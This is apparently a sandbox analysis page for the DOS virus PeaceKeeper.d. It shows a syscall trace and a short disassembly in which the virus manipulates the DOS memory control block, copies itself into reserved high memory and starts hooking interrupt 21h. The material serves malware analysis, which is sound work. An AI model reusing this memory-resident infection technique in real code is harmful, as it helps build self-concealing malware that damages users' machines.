Sample viewer

vx.netlux.org/Virus.DOS.PeaceKeeper.d

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:59:25.165701838Z 48 PC: 12bea | Get DOS version
2018-12-17T22:59:25.167589005Z 222 PC: 12bfd | UNKNOWN!
2018-12-17T22:59:25.168807736Z 53 PC: 12c2a | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-17T22:59:25.170110845Z 53 PC: 12c37 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:59:25.171705842Z 52 PC: 12b7f | Get InDOS flag pointer
2018-12-17T22:59:25.174489223Z 42 PC: 12c6c | Get date

0x12c6c: mov byte ptr [si + 0xa93], dh
0x12c70: mov bx, word ptr [si + 0xa43]
0x12c74: dec bx
0x12c75: mov es, bx
0x12c77: sub bx, bx
0x12c79: cmp byte ptr es:[bx], 0x5a
0x12c7d: je 0x12c82
0x12c7f: jmp 0x12b1d
0x12c82: mov ax, 0x184
0x12c85: sub word ptr es:[bx + 3], ax
0x12c89: sub word ptr es:[bx + 0x12], ax
0x12c8d: mov es, word ptr es:[bx + 0x12]
0x12c91: push si
0x12c92: sub cx, cx
0x12c94: sub di, di
0x12c96: or di, 0x100
0x12c9a: or cx, 0xf00
0x12c9e: rep movsb byte ptr es:[di], byte ptr [si]
0x12ca0: pop si
0x12ca1: mov ax, 0x2521